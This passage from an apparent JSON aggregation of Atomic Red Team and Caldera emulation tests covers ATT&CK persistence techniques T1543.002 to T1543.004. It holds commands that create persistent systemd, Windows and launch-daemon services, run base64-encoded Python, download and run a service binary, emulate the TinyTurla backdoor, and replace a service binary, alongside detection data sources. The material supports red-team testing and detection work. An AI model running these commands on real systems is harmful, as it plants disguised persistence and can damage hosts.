base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n", + "source": "atomics/T1543.002/T1543.002.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.002", + "display_name": "Create or Modify System Process: Systemd Service", + "atomic_tests": [ + { + "name": "Create Systemd Service", + "auto_generated_guid": "d9e4f24f-aa67-4c6e-bcbf-85622b697a7c", + "description": "This test creates a Systemd service unit file and enables it as a service.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "systemd_service_path": { + "description": "Path to systemd service unit file", + "type": "Path", + "default": "/etc/systemd/system" + }, + "systemd_service_file": { + "description": "File name of systemd service unit file", + "type": "String", + "default": "art-systemd-service.service" + }, + "execstoppost_action": { + "description": "ExecStopPost action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstoppost-marker" + }, + "execreload_action": { + "description": "ExecReload action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execreload-marker" + }, + "execstart_action": { + "description": "ExecStart action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstart-marker" + }, + "execstop_action": { + "description": "ExecStop action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstop-marker" + }, + "execstartpre_action": { + "description": "ExecStartPre action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstartpre-marker" + }, + "execstartpost_action": { + "description": "ExecStartPost action for Systemd service", + "type": "String", + "default": "/bin/touch /tmp/art-systemd-execstartpost-marker" + } + }, + "executor": { + "command": "echo \"[Unit]\" > #{systemd_service_path}/#{systemd_service_file}\necho \"Description=Atomic Red Team Systemd Service\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Service]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"Type=simple\"\necho \"ExecStart=#{execstart_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPre=#{execstartpre_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStartPost=#{execstartpost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecReload=#{execreload_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStop=#{execstop_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"ExecStopPost=#{execstoppost_action}\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"[Install]\" >> #{systemd_service_path}/#{systemd_service_file}\necho \"WantedBy=default.target\" >> #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\nsystemctl enable #{systemd_service_file}\nsystemctl start #{systemd_service_file}\n", + "cleanup_command": "systemctl stop #{systemd_service_file}\nsystemctl disable #{systemd_service_file}\nrm -rf #{systemd_service_path}/#{systemd_service_file}\nsystemctl daemon-reload\n", + "name": "bash" + } + }, + { + "name": "Create Systemd Service file, Enable the service , Modify and Reload the service.", + "auto_generated_guid": "c35ac4a8-19de-43af-b9f8-755da7e89c89", + "description": "This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process. \n", + "supported_platforms": [ + "linux" + ], + "dependencies": [ + { + "description": "System must be Ubuntu ,Kali OR CentOS.\n", + "prereq_command": "if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then exit /b 0; else exit /b 1; fi;\n", + "get_prereq_command": "echo Please run from Ubuntu ,Kali OR CentOS.\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n", + "cleanup_command": "systemctl stop T1543.002\nsystemctl disable T1543.002\nrm -rf /etc/init.d/T1543.002\nsystemctl daemon-reload\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ] + ] + }, + { + "technique_id": "T1543.003", + "command_list": [ + "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "sc.exe create #{service_name} binPath= PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\nsc.exe start #{service_name}\n", + "sc.exe create AtomicTestService_CMD binPath= #{binary_path}\nsc.exe start AtomicTestService_CMD\n", + "New-Service -Name \"#{service_name}\" -BinaryPathName \"PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\"\nStart-Service -Name \"#{service_name}\"\n", + "New-Service -Name \"AtomicTestService_PowerShell\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"AtomicTestService_PowerShell\"\n", + "copy $PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n" + ], + "commands": [ + { + "command": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "sc.exe create #{service_name} binPath= PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\nsc.exe start #{service_name}\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "sc.exe create AtomicTestService_CMD binPath= #{binary_path}\nsc.exe start AtomicTestService_CMD\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "New-Service -Name \"#{service_name}\" -BinaryPathName \"PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe\"\nStart-Service -Name \"#{service_name}\"\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "New-Service -Name \"AtomicTestService_PowerShell\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"AtomicTestService_PowerShell\"\n", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "copy $PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "source": "atomics/T1543.003/T1543.003.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Windows Service" + }, + { + "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n", + "source": "data/abilities/persistence/52771610-2322-44cf-816b-a7df42b4c086.yml", + "name": "This is an example technique. snmptrap.exe should be changed in the command\nbelow with the new desired service binary. Depending on the value of\nhost.service.modifiable this ability can damage the target system.\n" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.003", + "display_name": "Create or Modify System Process: Windows Service", + "atomic_tests": [ + { + "name": "Modify Fax service to run PowerShell", + "auto_generated_guid": "ed366cde-7d12-49df-a833-671904770b9f", + "description": "This test will temporarily modify the service Fax by changing the binPath to PowerShell\nand will then revert the binPath change, restoring Fax to its original state.\nUpon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", + "cleanup_command": "sc config Fax binPath= \"C:\\WINDOWS\\system32\\fxssvc.exe\" >nul 2>&1" + } + }, + { + "name": "Service Installation CMD", + "auto_generated_guid": "981e2942-e433-44e9-afc1-8c957a1496b6", + "description": "Download an executable from github and start it as a service.\nUpon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_path": { + "description": "Name of the service binary, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe" + }, + "service_name": { + "description": "Name of the Service", + "type": "String", + "default": "AtomicTestService_CMD" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Service binary must exist on disk at specified location (#{binary_path})\n", + "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "sc.exe create #{service_name} binPath= #{binary_path}\nsc.exe start #{service_name}\n", + "cleanup_command": "sc.exe stop #{service_name} >nul 2>&1\nsc.exe delete #{service_name} >nul 2>&1\n" + } + }, + { + "name": "Service Installation PowerShell", + "auto_generated_guid": "491a4af6-a521-4b74-b23b-f7b3f1ee9e77", + "description": "Installs A Local Service via PowerShell.\nUpon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_path": { + "description": "Name of the service binary, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1543.003\\bin\\AtomicService.exe" + }, + "service_name": { + "description": "Name of the Service", + "type": "String", + "default": "AtomicTestService_PowerShell" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Service binary must exist on disk at specified location (#{binary_path})\n", + "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "New-Service -Name \"#{service_name}\" -BinaryPathName \"#{binary_path}\"\nStart-Service -Name \"#{service_name}\"\n", + "cleanup_command": "Stop-Service -Name \"#{service_name}\" 2>&1 | Out-Null\ntry {(Get-WmiObject Win32_Service -filter \"name='#{service_name}'\").Delete()}\ncatch {}\n" + } + }, + { + "name": "TinyTurla backdoor service w64time", + "auto_generated_guid": "ef0581fd-528e-4662-87bc-4c2affb86940", + "description": "It's running Dll as service to emulate the tine turla backdoor\n\n[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dllfilename": { + "description": "It specifies Dll file to run as service", + "type": "string", + "default": "$PathToAtomicsFolder\\T1543.003\\bin\\w64time.dll" + } + }, + "executor": { + "command": "copy #{dllfilename} %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "cleanup_command": "sc stop W64Time\nsc.exe delete W64Time\ndel %systemroot%\\system32\\w64time.dll\nreg delete \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /f\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /f", + "name": "command_prompt", + "elevation_required": true + } + } + ] + }, + { + "id": "52771610-2322-44cf-816b-a7df42b4c086", + "name": "Replace a service binary with alternate binary", + "description": "This is an example technique. snmptrap.exe should be changed in the command\nbelow with the new desired service binary. Depending on the value of\nhost.service.modifiable this ability can damage the target system.\n", + "tactic": "persistence", + "technique": { + "attack_id": "T1543.003", + "name": "Create or Modify System Process: Windows Service" + }, + "platforms": { + "windows": { + "psh": { + "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n", + "cleanup": "$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nIf (Test-Path ($path + \".saved\")) {\n Remove-Item $path;\n Move-Item -Path ($path + \".saved\") -Destination $path\n}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.service.modifiable" + } + ] + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1543.004", + "command_list": [ + "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/com.atomicredteam.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.atomicredteam.plist\n", + "sudo cp $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n" + ], + "commands": [ + { + "command": "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/com.atomicredteam.plist\nsudo launchctl load -w /Library/LaunchDaemons/com.atomicredteam.plist\n", + "source": "atomics/T1543.004/T1543.004.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Daemon" + }, + { + "command": "sudo cp $PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n", + "source": "atomics/T1543.004/T1543.004.yaml", + "name": "Atomic Red Team Test - Create or Modify System Process: Launch Daemon" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1543.004", + "display_name": "Create or Modify System Process: Launch Daemon", + "atomic_tests": [ + { + "name": "Launch Daemon", + "auto_generated_guid": "03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf", + "description": "Utilize LaunchDaemon to launch `Hello World`\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "plist_filename": { + "description": "filename", + "type": "String", + "default": "com.atomicredteam.plist" + }, + "path_malicious_plist": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_malicious_plist})\n", + "prereq_command": "if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"The plist file doesn't exist. Check the path and try again.\"; exit 1;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}\nsudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}\n", + "cleanup_command": "sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}\nsudo rm /Library/LaunchDaemons/#{plist_filename}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + 